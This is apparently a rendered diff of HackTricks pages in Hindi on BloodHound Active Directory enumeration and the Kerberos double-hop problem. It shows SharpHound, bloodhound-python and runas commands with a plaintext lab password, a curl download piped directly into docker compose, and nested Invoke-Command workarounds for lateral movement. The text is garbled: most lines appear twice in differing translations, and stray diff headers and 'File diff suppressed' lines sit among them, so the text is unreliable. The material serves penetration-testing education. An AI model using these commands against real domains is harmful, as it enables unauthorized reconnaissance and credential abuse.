Booldhound में मुख्य रूप से दो भाग होते हैं: **ingestors** और **विज़ुअलाइज़ेशन एप्लिकेशन**।
Bloodhound 2 मुख्य भागों से मिलकर बना है: **इनजेस्टर्स** और **विजुअलाइजेशन एप्लिकेशन**।
**ingestors** का उपयोग **डोमेन को सूचीबद्ध करने और सभी जानकारी को निकालने** के लिए किया जाता है जिसे विज़ुअलाइज़ेशन एप्लिकेशन समझ सकता है
**इनजेस्टर्स** का उपयोग **डोमेन को गणना करने और सभी जानकारी निकालने** के लिए किया जाता है जिसे विजुअलाइजेशन एप्लिकेशन समझेगा
**विजुअलाइजेशन एप्लिकेशन neo4j का उपयोग करता है** यह दिखाने के लिए कि सभी जानकारी कैसे संबंधित है और डोमेन में विशेषाधिकार वृद्धि के विभिन्न तरीके कैसे दिखाए जा सकते हैं
**विजुअलाइजेशन एप्लिकेशन neo4j का उपयोग करता है** ताकि दिखाए कैसे सभी जानकारी संबंधित है और डोमेन में विशेषाधिकारों को बढ़ाने के विभिन्न तरीके दिखाए
### स्थापना
BloodHound CE के निर्माण के बाद, पूर परियोजना को Docker के साथ उपयोग में आसानी के लिए अपडेट किया गया था। शुरू करने का सबसे आसान तरीका इसके पूर्व-निर्धारित Docker Compose कॉन्फ़िगरेशन का उपयोग करना है।
BloodHound CE के निर्माण के बाद, पूर परियोजना को Docker के साथ उपयोग सुविधा के लिए अपडेट किया गया था। शुरू करने का सबसे आसान तरीका इसका पूर्व-कॉन्फ़िगर किया गया Docker Compose विन्यास का उपयोग करना है।
1. Docker Compose स्थापित करें। यह [Docker Desktop](https://www.docker.com/products/docker-desktop/) स्थापना के साथ शामिल होना चाहिए।
2. चलाएँ:
```
curl -L https://ghst.ly/getbhce | docker compose -f - up
```
3. टर्मिनल आउटपुट में Docker Compose के यादृच्छिक रूप से उत्पन्न पासवर्ड को खोजें।
4. एक ब्राउज़र में, http://localhost:8080/ui/login पर नेविगेट करें। admin नाम के साथ लॉगिन करें और लॉग्स से प्राप्त यादृच्छिक रूप से उत्पन्न पासवर्ड का उपयोग करें।
3. डॉकर कंपोज़ के टर्मिनल आउटपुट में यादृच्छिक रूप से उत्पन्न पासवर्ड का पता लगाएं।
4. ब्राउज़र में, http://localhost:8080/ui/login पर जाएं। एडमिन उपयोगकर्ता नाम और लॉग्स से यादृच्छिक रूप से उत्पन्न पासवर्ड के साथ लॉगिन करें।
इसके बाद आपको यादृच्छिक रूप से उत्पन्न पासवर्ड बदलने की आवश्यकता होगी और आपके पास नया इंटरफ़ेस तैयार होगा, जिससे आप सीधे इन्जेस्टर्स डाउनलोड कर सकते हैं।
इसके बाद आपको यादृच्छिक रूप से उत्पन्न पासवर्ड बदलने की आवश्यकता होगी और आपके पास नया इंटरफेस तैयार हो जाएगा, जिससे आप सीधे इंजेस्टर्स को डाउनलोड कर सकते हैं।
### SharpHound
उनके पास कई विकल्प हैं लेकिन यदि आप डोमेन से जुड़े पीसी से SharpHound चलाना चाहते हैं, अपने वर्तमान उपयोगकर्ता का उपयोग करके और सभी जानकारी निकालना चाहते हैं तो आप कर सकते हैं:
उनके पास कई विकल्प हैं, लेकिन यदि आप डोमेन से जुड़े एक पीसी से SharpHound चलाना चाहते हैं, अपने वर्तमान उपयोगकर्ता का उपयोग करके सभी जानकारी निकालने के लिए आप कर सकते हैं:
```
./SharpHound.exe --CollectionMethods All
Invoke-BloodHound -CollectionMethod All
```
> **CollectionMethod** और लूप सेशन के बारे में आप यहाँ और पढ़ सकते हैं [यहाँ](https://support.bloodhoundenterprise.io/hc/en-us/articles/17481375424795-All-SharpHound-Community-Edition-Flags-Explained)
> आप **CollectionMethod** और लूप सत्र के बारे में अधिक पढ़ सकते हैं [यहाँ](https://support.bloodhoundenterprise.io/hc/en-us/articles/17481375424795-All-SharpHound-Community-Edition-Flags-Explained)
यदि आप अलग प्रमाणीकरण (credentials) का उपयोग करके SharpHound चलाना चाहते हैं, तो आप CMD netonly सेशन बना सकते हैं और वहां से SharpHound चला सकते हैं:
यदि आप विभिन्न क्रेडेंशियल का उपयोग करके SharpHound को निष्पादित करना चाहते हैं तो आप एक CMD netonly सत्र बना सकते हैं और वहां से SharpHound चला सकते हैं:
```
runas /netonly /user:domain\user "powershell.exe -exec bypass"
```
[**ired.team पर Bloodhound के बारे में और जानें।**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux)
[**आईआरईडी टीम में ब्लडहाउंड के बारे में अधिक जानें।**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux)
## पुराना Bloodhound
## पुराना ब्लडहाउंड
### स्थापना
1. Bloodhound
1. ब्लडहाउंड
विज़ुअलाइज़ेशन एप्लिकेशन स्थापित करने के लिए आपको **neo4j** और **bloodhound एप्लिकेशन** स्थापित करने की आवश्यकता होगी।\
इसे करने का सबसे आसान तरीका है:
दृश्यीकरण एप्लिकेशन स्थापित करने के लिए आपको **नेओ4जे** और **ब्लडहाउंड एप्लिकेशन** स्थापित करने की आवश्यकता ह।\
इसे करने का सबसे आसान तरीका यह है:
```
apt-get install bloodhound
```
आप **neo4j का कम्युनिटी वर्जन डाउनलोड कर सकते हैं** [यहाँ से](https://neo4j.com/download-center/#community).
आप **नियो4ज की समुदाय संस्करण** को [यहाँ से](https://neo4j.com/download-center/#community) डाउनलोड कर सकते हैं।
1. इन्जेस्टर्स
1. इजेस्टर्स
आप इन्जेस्टर्स यहाँ से डाउनलोड कर सकते हैं:
आप इंजेस्टर्स को निम्नलिखित स्थान से डाउनलोड कर सकते हैं:
* https://github.com/BloodHoundAD/SharpHound/releases
* https://github.com/BloodHoundAD/BloodHound/releases
@ -102,24 +89,24 @@ apt-get install bloodhound
1. ग्राफ से पथ सीखें
Bloodhound में विभिन्न क्वेरीज़ होती हैं जो संवेदनशील समझौता पथ को उजागर करती हैं। इसमें कस्टम क्वेरीज़ जोड़ना संभव है ताकि खोज और ऑब्जेक्ट्स के बीच संबंधों को बेहतर बनाया जा सके!
Bloodhound विभिन्न क्वेरी के साथ आता है जो संवेदनशील कम्प्रोमाइस पथ को हाइलाइट करने के लिए है। यह संभावना है कि आप खोज और वस्तुओं के बीच संबंध को बढ़ाने के लिए कस्टम क्वेरी जोड़ सकते हैं!
इस रेपो में क्वेरीज़ का अच्छा संग्रह है: https://github.com/CompassSecurity/BloodHoundQueries
इस रेपो में क्यूरीज का एक अच्छा संग्रह है: https://github.com/CompassSecurity/BloodHoundQueries
इंस्टालेशन प्रक्रिया:
स्थापना प्रक्रिया:
```
$ curl -o "~/.config/bloodhound/customqueries.json" "https://raw.githubusercontent.com/CompassSecurity/BloodHoundQueries/master/BloodHound_Custom_Queries/customqueries.json"
```
### विज़ुअलाइज़ेशन ऐप निष्पाद
### विज़ुअलाइज़ेशन एप्लिकेशन क्रियान्वय
आवश्यक एप्लिकेशन्स को डाउनलोड/इंस्टॉल करने के बाद, आइए उन्हें शुरू करें।\
सबसे पहले आपको **neo4j डेटाबेस को शुरू करना होगा**:
आवश्यक एप्लिकेशनों को डाउनलोड/स्थापित करने के बाद, उन्हें शुरू करें।\
सबसे पहले, आपको **नियो4ज डेटाबेस शुरू करना होगा**:
```bash
./bin/neo4j start
#or
service neo4j start
```
पहली बार जब आप इस डेटाबेस को शुरू करेंगे, आपको [http://localhost:7474/browser/](http://localhost:7474/browser/) पर जाना होगा। आपसे डिफ़ॉल्ट क्रेडेंशियल्स (neo4j:neo4j) पूछे जाएंगे और आपसे **पासवर्ड बदलने की आवश्यकता होगी**, इसलिए इसे बदलें और इसे भूलें नहीं।
पहली बार जब आप इस डेटाबेस को शुरू करेंगे तो आपको [http://localhost:7474/browser/](http://localhost:7474/browser/) तक पहुंचने की आवश्यकता होगी। आपसे डिफ़ॉल्ट क्रेडेंशियल्स (neo4j:neo4j) की मांग की जाएगी और आपको **पासवर्ड बदलना अनिवार्य होगा**, इसलिए उसे बदल दें और उसे भूल न जाएं।
अब, **bloodhound एप्लिकेशन** शुरू करें:
```bash
@ -127,37 +114,38 @@ service neo4j start
#or
bloodhound
```
आपसे डेटाबेस क्रेडेंशियल्स के लिए पूछा जाएगा: **neo4j:\<आपका नया पासवर्ड>**
आपसे डेटाबेस क्रेडेंशियल के लिए पूछा जाएगा: **neo4j:\<आपका नया पासवर्ड>**
और bloodhound डेटा इनजेस्ट करने के लिए तैयार होगा।
और bloodhound डेटा इनजेस्ट करने के लिए तैयार हो जाएगा।
![](<../../.gitbook/assets/image (171) (1).png>)
### **Python bloodhound**
यदि आपके पास डोमेन क्रेडेंशियल्स हैं तो आप किसी भी प्लेटफॉर्म से **python bloodhound ingestor चला सकते हैं** इसलिए आपको Windows पर निर्भर नहीं हना पड़ेगा।\
इसे [https://github.com/fox-it/BloodHound.py](https://github.com/fox-it/BloodHound.py) से डाउनलोड करें या `pip3 install bloodhound` करे।
अगर आपके पास डोमेन क्रेडेंशियल हैं तो आप किसी भी प्लेटफॉर्म से **पायथन ब्लडहाउंड इंजेस्टर चला सकते हैं** ताकि आपको Windows पर निर्भर नहीं हना पड़े।\
इसे [https://github.com/fox-it/BloodHound.py](https://github.com/fox-it/BloodHound.py) से डाउनलोड करें या `pip3 install bloodhound` करे
```bash
bloodhound-python -u support -p '#00^BlackKnight' -ns 10.10.10.192 -d blackfield.local -c all
```
यदि आप इसे proxychains के माध्यम से चला रहे हैं तो DNS समाधान को प्रॉक्सी के माध्यम से काम करने के लिए `--dns-tcp` जोड़ें।
यदि आप इसे प्रॉक्सीचेन्स के माध्यम से चला रहे हैं तो DNS संक्षेप काम करने के लिए `--dns-tcp` जोड़ें।
```bash
proxychains bloodhound-python -u support -p '#00^BlackKnight' -ns 10.10.10.192 -d blackfield.local -c all --dns-tcp
```
### Python SilentHound
यह स्क्रिप्ट **Active Directory Domain को LDAP के माध्यम से शांतिपूर्वक सूचीबद्ध करेगी**, जिसमें उपयोगकर्ताओं, व्यवस्थापकों, समूहों आदि का विश्लेषण होता है
यह स्क्रिप्ट **LDAP के माध्यम से Active Directory डोमेन को शांति से जांचेगा** और उपयोगकर्ताओं, व्यवस्थापकों, समूह आदि को पार्स करेगा
इसे [**SilentHound github**](https://github.com/layer8secure/SilentHound) पर देखें।
इसे देखें [**SilentHound github**](https://github.com/layer8secure/SilentHound).
### RustHound
BloodHound in Rust, [**यहाँ जांचें**](https://github.com/OPENCYBER-FR/RustHound)।
Rust में BloodHound, इसे [**यहाँ देखें**](https://github.com/OPENCYBER-FR/RustHound).
## Group3r
[**Group3r**](https://github.com/Group3r/Group3r) **** एक उपकरण है जो Active Directory से जुड़ी **Group Policy** में **भेद्यताओं** का पता लगाता है। \
आपको डोमेन के अंदर के किसी भी होस्ट से **group3r चलाना होगा** **किसी भी डोमेन उपयोगकर्ता** का उपयोग करते हुए
[**Group3r**](https://github.com/Group3r/Group3r) **** एक उपकरण है जो Active Directory से संबंधित **समूह नीति** में **कमजोरियों** को खोजने के लिए है। \
आपको **किसी भी डोमेन उपयोगकर्ता** का उपयोग करके डोमेन के भीतर से **ग्रुप3r चलाना** होगा
```bash
group3r.exe -f <filepath-name.log>
# -s sends results to stdin
@ -165,18 +153,6 @@ group3r.exe -f <filepath-name.log>
```
## PingCastle
[**PingCastle**](https://www.pingcastle.com/documentation/) **AD पर्यावरण की सुरक्षा स्थिति का मूल्यांकन करता है** और ग्राफ़ के साथ एक अच्छी **रिपोर्ट** प्रदान करता है।
****[**PingCastle**](https://www.pingcastle.com/documentation/) **एडी वातावरण की सुरक्षा स्थिति का मूल्यांकन करता है** और एक अच्छी **रिपोर्ट** प्रदान करता है जिसमें ग्राफ शामिल हैं
इसे चलाने के लिए, आप `PingCastle.exe` बाइनरी को निष्पादित कर सकते हैं और यह विकल्पों के मेनू के साथ एक **इंटरैक्टिव सत्र** शुरू करेगा। उपयोग करने के लिए डिफ़ॉल्ट विकल्प **`healthcheck`** है जो **डोमेन** का एक बेसलाइन **अवलोकन** स्थापित करेगा, और **गलत कॉन्फ़िगरेशन** और **कमजोरियों** का पता लगाएगा।
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप PEASS के **नवीनतम संस्करण तक पहुँच प्राप्त करना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में या **Twitter** पर मुझे **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें, [hacktricks repo](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके**
</details>
इसे चलाने के लिए, `PingCastle.exe` नामक बाइनरी को चला सकते हैं और यह एक **इंटरैक्टिव सत्र** शुरू करेगा जिसमें विकल्पों का एक मेनू प्रस्तुत किया जाएगा। उपयोग करने के लिए डिफ़ॉल्ट विकल्प **`healthcheck`** है जो **डोमेन** का एक मूल **अवलोकन** स्थापित करेगा, और **misconfigurations** और **वंलरेबिलिटीज़** को खोजेगा।&#x20;

File diff suppressed because one or more lines are too long

View file

@ -4,11 +4,11 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापन देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटीज़**](https://opensea.io/collection/the-peass-family) संग्रह।
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटीएस**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**।**
* **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर पर फॉलो** करें **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**।**
* **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**।
</details>

View file

@ -2,69 +2,69 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल** हों या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें**.
* **अपने हैकिंग ट्रिक्स को** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **में PR जमा करके अपना योगदान दें**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन हैकट्रिक्स में** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड** करना चाहते हैं? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह देखें
* [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मेरा** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **पालन** करें।
* **हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud)।
</details>
## परिचय
केरबेरोस "डबल हॉप" समस्या उत्पन्न होती है जब एक हमलावर को दो **हॉप** के माध्यम से केरबेरोस प्रमाणीकरण का उपयोग करने की कोशिश करता है, उदाहरण के लिए **PowerShell**/**WinRM** का उपयोग करके।
केरबेरोस "डबल हॉप" समस्या उत्पन्न होती है जब एक हमलावर दो **हॉप** के माध्यम से **केरबेरोस प्रमाणीकरण का उपयोग** करने का प्रयास करता है, उदाहरण के लिए **PowerShell**/**WinRM** का उपयोग करके।
जब केरबेरोस के माध्यम से **प्रमाणीकरण** होता है, तो **क्रेडेंशियल्स** को **मेमोरी में कैश नहीं किया जाता है।** इसलिए, यदि आप mimikatz चलाते हैं तो आपको मशीन में उपयो्ता के क्रेडेंशियल्स नहीं मिलेंगे, भले ही वह प्रक्रियाएँ चला रहा हो।
जब **केरबेरोस** के माध्यम से **प्रमाणीकरण** होता है, **क्रेडेंशियल** **मेमोरी में कैश नहीं** होती हैं। इसलिए, यदि आप mimikatz चलाते हैं तो आपको प्रयोक्ता के क्रेडेंशियल मशीन में नहीं मिलेंगे भले ही वह प्रक्रियाएँ चला रहा हो।
यह इसलिए है क्योंकि केरबेरोस के साथ कनेक्ट करते समय ये कदम होते हैं:
1. पयो्ता 1 क्रेडेंशियल्स प्रदान करता है और **डोमेन कंट्रोलर** उपयोगकर्ता 1 को केरबेरोस **TGT** वापस करता है।
2. पयो्ता 1 **TGT** का उपयोग करके **सर्विस टिकट** का अनुरोध करता है **सर्वर 1** से कनेक्ट होने के लिए।
3. उपयोगकर्ता 1 **सर्वर 1** से कनेक्ट होता है और **सर्विस टिकट** प्रदान करता है।
4. **सर्वर 1** में पयो्ता 1 के **क्रेडेंशियल्स** या **TGT** नहीं होते हैं। इसलिए, जब सर्वर 1 से उपयोगकर्ता 1 दूसरे सर्वर में लॉगिन करने की कोशिश करता है, वह **प्रमाणीकरण करने में सक्षम नहीं होता है**
1. प्रयोक्ता1 क्रेडेंशियल प्रदान करता है और **डोमेन कंट्रोलर** प्रयोक्ता1 को एक केरबेरोस **TGT** लौटाता है।
2. प्रयोक्ता1 **TGT** का उपयोग करके **सेवा टिकट** का अनुरोध करता है **सर्वर1** से **कनेक्ट** होने के लिए।
3. प्रयोक्ता1 **सर्वर1** से **कनेक्ट** करता है और **सेवा टिकट** प्रदान करता है।
4. **सर्वर1** में प्रयोक्ता1 के **क्रेडेंशियल** या **TGT** नहीं होते हैं। इसलिए, जब प्रयोक्ता1 सर्वर1 से दूसरे सर्वर में लॉगिन करने का प्रयास करता है, वह **प्रमाणीकरण** नहीं कर पाता है
### असीमित डिलीगेश
### असीमित अनुबंध
यदि PC में **असीमित डिलीगेशन** सक्षम है, तो ऐसा नहीं होगा क्योंकि **सर्वर** को उसे एक उपयोगकर्ता के **TGT** मिलेगा जो उसे उपयोग कर रहा है। इसके अलावा, यदि असीमित डिलीगेशन का उपयोग किया जाता है, तो आप शायद इससे **डोमेन कंट्रोलर को संक्रमित** कर सकते हैं।\
[**असीमित डिलीगेशन पृष्ठ में अधिक जानकारी**](unconstrained-delegation.md).
यदि PC में **असीमित अनुबंधन** सक्षम है, तो यह नहीं होगा क्योंकि **सर्वर** को उसे एक भी उपयोगकर्ता का **TGT** मिलेगा जो इसे एक्सेस कर रहा है। इसके अतिरिक्त, यदि असीमित अनुबंधन का उपयोग किया जाता है तो आप शायद इससे **डोमेन कंट्रोलर** को **कंप्रोमाइज** कर सकते हैं।\
[**असीमित अनुबंधन पृष्ठ में अधिक जानकारी**](unconstrained-delegation.md)
### CredSSP
इस समस्या से बचने के लिए **सिस्टम व्यवस्थापकों** के लिए एक और सुझाव दिया जाता है जो [**अत्यंत असुरक्षित**](https://docs.microsoft.com/en-us/powershell/module/microsoft.wsman.management/enable-wsmancredssp?view=powershell-7) है, वह है **Credential Security Support Provider (CredSSP)**। CredSSP को सक्षम करने का समाधान विभिन्न फोरमों पर वर्षों से उल्लेखित किया गया है। माइक्रोसॉफ्ट के अनुसार:
इस समस्या से बचने के लिए **सिस्टम व्यवस्थापकों** के लिए एक और सुझाव जो [**विशेष रूप से असुरक्षित है**](https://docs.microsoft.com/en-us/powershell/module/microsoft.wsman.management/enable-wsmancredssp?view=powershell-7) है **क्रेडेंशियल सुरक्षा समर्थन प्रदाता**। CredSSP को सक्षम करना वर्षों से विभिन्न फोरमों में उल्लेखित समाधान रहा है। माइक्रोसॉफ्ट से:
_"CredSSP प्रमाणीकरण स्थानीय कंप्यूटर से दूसरे कंप्यूटर को उपयोगकर्ता क्रेडेंशियल्स अनुप्रेषित करता है। इस अभ्यास से दूरस्थ कंप्यूटर की सुरक्षा जोखिम बढ़ जाता है। यदि दूरस्थ कंप्यूटर प्रभावित हो जाता है, तो जब क्रेडेंशियल्स उसे पास किए जाते हैं, तो क्रेडेंशियल्स का उपयोग नेटवर्क सत्र को नियंत्रित करने के लिए किया जा सकता है।"_
_“CredSSP प्रमाणीकरण स्थानीय कंप्यूटर से दूरस्थ कंप्यूटर को उपयोगकर्ता क्रेडेंशियल अनुप्रेषित करता है। यह अभ्यास दूरस्थ संचालन का सुरक्षा जोखिम बढ़ाता है। यदि दूरस्थ कंप्यूटर को कंप्रोमाइज़ किया जाता है, जब क्रेडेंशियल उसे पारित किए जाते हैं, तो क्रेडेंशियल का उपयोग नेटवर्क सत्र को नियंत्रित करने के लिए किया जा सकता है।_
यदि आप प्रोडक्शन सिस्टमों, संवेदनशील नेटवर्कों आदि पर **CredSSP सक्षम** पाते हैं, तो उन्हें अक्षम करना सिफारिश किया जाता है। CredSSP स्थिति की जांच करने का एक त्वरित तरीका है `Get-WSManCredSSP` चलाना। जो दूरस्थता में निष्पादित किया जा सकता है यदि WinRM सक्षम है।
यदि उत्पादन सिस्टमों, संवेदनशील नेटवर्क आदि पर **CredSSP सक्षम** पाए जाते हैं, तो सुझाव दिया जाता है कि उन्हें अक्षम किया जाए। CredSSP स्थिति की जांच करने का एक त्वरित तरीका है `Get-WSManCredSSP` चलाकर। जो दूरस्थ से निष्क्रिय किया जा सकता है यदि WinRM सक्षम है।
```powershell
Invoke-Command -ComputerName bizintel -Credential ta\redsuit -ScriptBlock {
Get-WSManCredSSP
}
```
## उपाय
## कार्यारूपण
### Invoke Command <a href="#invoke-command" id="invoke-command"></a>
### आवाज़ कमांड <a href="#invoke-command" id="invoke-command"></a>
यह विधि दोहरी हॉप समस्या के साथ काम करने की तरह है, न कि इसे हल करने की तरह। इसमें कोई कॉन्फ़िगरेशन की आवश्यकता नहीं होती है, और आप इसे आसानी से अपने हमलावर बॉक्स से चला सकते हैं। यह मूल रूप से एक **नेस्टेड `Invoke-Command`** है।
यह विधि दोहरी हॉप समस्या के साथ काम करने की तरह है, जिसे आवश्यकता नहीं है। इसमें कोई विन्यास नहीं है, और आप इसे आसानी से अपने हमले वाले बॉक्स से चला सकते हैं। यह मूल रूप से एक **नेस्टेड `Invoke-Command`** है।
यह **दूसरे सर्वर पर `hostname` चलाएगा:**
यह **दूसरे सर्वर पर `hostname`** चलाएगा:
```powershell
$cred = Get-Credential ta\redsuit
Invoke-Command -ComputerName bizintel -Credential $cred -ScriptBlock {
Invoke-Command -ComputerName secdev -Credential $cred -ScriptBlock {hostname}
}
```
आपके पास पहले सर्वर के साथ एक **PS-Session** स्थापित किया जा सकता है और बस वहां से `$cred` के साथ **`Invoke-Command`** चला सकते हैं इसे नेस्ट करने की बजाय। हालांकि, इसे अपने हमलावर बॉक्स से चलाने से कार्य केंद्रीकृत होता है:
आप एक **PS-Session** को **पहले सर्वर** के साथ स्थापित कर सकते हैं और बस वहां से **`Invoke-Command`** को `$cred` के साथ **चला** सकते हैं इसे नेस्ट करने की बजाय। हालांकि, अपने हमलावार बॉक्स से इसे चलाना कार्यक्षमता को केंद्रीकृत करता है:
```powershell
# From the WinRM connection
$pwd = ConvertTo-SecureString 'uiefgyvef$/E3' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('DOMAIN\username', $pwd)
# Use "-Credential $cred" option in Powerview commands
```
### पीएससेशन कॉन्फ़िगरेशन पंजीकृत करें
### रजिस्टर PSSession Configuration
यदि आप **`evil-winrm`** की बजाय **`Enter-PSSession`** कमांडलेट का उपयोग कर सकते हैं, तो आप फिर से जुड़कर डबल हॉप समस्या को टाल सकते हैं। इसके लिए **`Register-PSSessionConfiguration`** का उपयोग करें:
यदि **`evil-winrm`** का उपयोग न करके आप **`Enter-PSSession`** cmdlet का उपयोग कर सकते हैं तो आप फिर **`Register-PSSessionConfiguration`** का उपयोग करके डबल हॉप समस्या को अनदखा करने के लिए पुनः कनेक्ट कर सकते हैं:
```powershell
# Register a new PS Session configuration
Register-PSSessionConfiguration -Name doublehopsess -RunAsCredential domain_name\username
@ -76,59 +76,51 @@ Enter-PSSession -ConfigurationName doublehopsess -ComputerName <pc_name> -Creden
klist
# In this session you won't have the double hop problem anymore
```
### पोर्ट फॉरवर्डिंग <a href="#portproxy" id="portproxy"></a>
### पोर्ट फॉरवर्डिंग <a href="#portproxy" id="portproxy"></a>
